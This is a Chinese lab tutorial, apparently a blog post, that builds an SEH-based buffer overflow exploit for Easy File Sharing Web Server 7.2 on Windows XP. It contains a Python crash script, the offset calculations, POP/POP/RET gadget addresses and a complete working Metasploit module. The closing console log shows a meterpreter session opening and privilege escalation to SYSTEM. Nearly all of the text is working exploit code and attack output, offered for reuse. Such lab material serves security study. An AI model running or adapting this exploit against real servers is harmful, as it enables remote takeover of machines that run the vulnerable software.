使用 Metasploit 实现基于 SEH 的缓冲区溢出
一、实验环境
1、攻击机
kali 2019-3
下载地址:https://www.kali.org/get-kali/
2、靶机
winXPSP3(英文版)
3、漏洞
Easy File Sharing Web Server 7.2
4、搭建实验环境
自行百度下载Easy File Sharing Web Server 7.2 并在XP 安装
二、计算偏移量
1、使用pattern_create工具
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 10000 > 10000.txt
2、创建缓冲区溢出攻击脚本 exploit.py
需要将字符序列构造到请求头中,形成"HEAD " + 字符序列 + " HTTP/1.0\r\n\r\n"的格式
(1)exploit.py
# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 2019-01-16 # Exploit Author: binghe # Version: 7.2 # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py ip port import socket import sys host = str(sys.argv[1]) port = int(sys.argv[2]) a = socket.socket() print "Connecting to: " + host + ":" + str(port) a.connect((host,port)) entire=4500 # Next SEH buff = "Metasploit中的pattern_create.rb生成的字符序列" # HEAD a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n") a.close() print "Done..."
- 将Metasploit中的pattern_create.rb生成的字符序列替换到“buff = "Metasploit中的pattern_create.rb生成的字符序列"”处即可
- 脚本来源:https://blog.csdn.net/l1028386804/article/details/86506457
(2)kali 运行缓冲区溢出脚本测试
root@kali:~/Desktop# python exploit.py 10.10.10.131 90 Connecting to: 10.10.10.131:90 Done... root@kali:~/Desktop#
(3)查看靶机上Easy File Sharing Web Server 7.2的状态
在靶机上可以看到Easy File Sharing Web Server 7.2程序由于缓冲区溢出从而退出了程序,说明我们的缓冲区溢出脚本exploit.py生效。
3、启动Easy File Sharing Web Server 7.2并将进程加载到ImmunityDebbuger中
4、运行缓冲区溢出脚本
root@kali:~/Desktop# python exploit.py 10.10.10.131 90 Connecting to: 10.10.10.131:90 Done... root@kali:~/Desktop#
5、查看Easy File Sharing Web Server 7.2溢出地址
catch块的地址为46356646, 下一条SEH记录地址为34664633
6、使用pattern_offset工具
(1)计算catch块偏移量
root@binghe:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 46356646 -l 10000 [*] Exact match at offset 4065
(2)计算下一条SEH记录偏移量
root@binghe:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 34664633 -l 10000 [*] Exact match at offset 4061
三、查找 POP/POP/RET 地址
1、Mona脚本
下载地址:https://github.com/corelan/mona
将mona.py放到与ImmunityDebugger.exe同级目录的PyCommands目录下
2、启动Mona
在ImmunityDebugger命令行下输入”!mona modules“命令启动Mona分析DLL文件。
3、使用msfbinscan计算POP/POP/RET地址
msf5 > msfbinscan -p /home/kali/Desktop/ImageLoad.dll [*] exec: msfbinscan -p /home/kali/Desktop/ImageLoad.dll [/home/kali/Desktop/ImageLoad.dll] 0x1000108b pop ebp; pop ebx; ret 0x10001274 pop ebp; pop ebx; ret 0x10001877 pop esi; pop ebx; ret 0x100018e0 pop esi; pop ebx; ret 0x10001d9f pop ebp; pop ebx; ret 0x100026e1 pop edi; pop ebx; ret 0x1000283e pop edi; pop esi; ret 0x100028ab pop edi; pop esi; ret 0x100029b5 pop esi; pop ebx; ret 0x10002b9b pop ebp; pop ebx; ret ………… 0x1002379d pop ebp; pop ebx; ret 0x100237cc pop ebp; pop ebx; ret 0x100237dc pop ebp; pop ebx; ret 0x10023945 pop edi; pop esi; ret 0x1002483f pop esi; pop ebx; ret 0x100248be pop esi; pop ebx; ret 0x100248ce pop esi; pop ebx; ret 0x100248df pop esi; pop ebx; ret
地址选择:排除掉所有可能会引起HTTP协议问题的地址(例如说连续不断的0)
此处以 0x1002379d 作为 POP/POP/RET的地址为例
四、编写 Metasploit 的 SEH 渗透模块
1、渗透代码(最终版)
class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'SEH Overflow Easy File Sharing HTTP Server 7.2', 'Description' => %q( This module demonstrate SEH based overflow example ), 'Author' => 'z9m8r8', 'License' => MSF_LICENSE, 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'RPORT' => 80, }, 'Payload' => { 'Space' => 390, 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e" }, 'Platform' => 'win', 'Targets' => [ [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x1002379d, 'Offset' => 4061 } ], ], 'DisclosureDate' => '2021-09-26', 'DefaultTarget' => 0 ) ) end def exploit connect weapon="HEAD " weapon<<make_nops(target['Offset']) weapon<<generate_seh_record(target.ret) weapon<<make_nops(19) weapon<<payload.encoded weapon<<" HTTP/1.0\r\n\r\n" sock.put(weapon) handler disconnect end end
注意:HEAD后面和HTTP前面都是有空格的!!!
2、代码简要分析
(1)Target
- 变量Ret( return address)中保存POP/POP/RET指令的地址 0x1002379d
- 变量Offset中保存偏移量4061
- 之所以使用4061来代替4065,是因为Metasploit会自动生成一个到ShellCode的短跳转指令。因此,要将4065字节的地址向前移4个字节,这样就可以把短跳转指令放到原本用来存放下一条SEH记录地址的位置。
(2)exploit
- 使用generate_seh_record()函数跳过提供跳转指令和到达攻击载荷的字节数量。
- 接下来,我们要在攻击载荷前填充一些数据,用来消除影响攻击载荷运行的不利因素
- 使用HTTP/1.0\r\n\r\n作为请求头部的结束部分。
- 最后,将保存在变量weapon中的数据发送到目标上
- 然后调用handler方法来检查该尝试是否成功。如果成功,我们将获得控制目标的权限。
3、代码调试所遇问题
root@kali:/usr/share/metasploit-framework/tools/dev# ./msftidy.rb /usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb /usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb - [WARNING] Explicitly requiring/loading msf/core is not necessary #删掉require 'msf/core'即可 /usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb - [INFO] No CVE references found. Please check before you land! /usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb - [ERROR] Incorrect disclosure date format #正确:2021-09-26,错误:2021-9-26 /usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb - [WARNING] Please use 'MetasploitModule' as the class name (you used Metasploit4) #将Metasploit4改为MetasploitModule /usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb:27 - [WARNING] Spaces at EOL root@kali:/usr/share/metasploit-framework/tools/dev#
4、msf 运行测试
root@kali:/# msfconsole ………… ………… msf5 > use exploit/windows/z9m8r8_test/seh_attack_by_z9m8r8 msf5 exploit(windows/z9m8r8_test/seh_attack_by_z9m8r8) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf5 exploit(windows/z9m8r8_test/seh_attack_by_z9m8r8) > set rhost 10.10.10.131 rhost => 10.10.10.131 msf5 exploit(windows/z9m8r8_test/seh_attack_by_z9m8r8) > set rport 90 rport => 90 msf5 exploit(windows/z9m8r8_test/seh_attack_by_z9m8r8) > exploit [*] Started bind TCP handler against 10.10.10.131:4444 [*] Sending stage (179779 bytes) to 10.10.10.131 [*] Meterpreter session 1 opened (10.10.10.148:38999 -> 10.10.10.131:4444) at 2021-09-25 22:16:28 -0400 meterpreter > getuid Server username: DH-CA8822AB9589\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter >
参考自:
《精通Metasploit渗透测试 第2版》
https://blog.csdn.net/l1028386804/article/details/86506457
不忘初心,方得始终。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?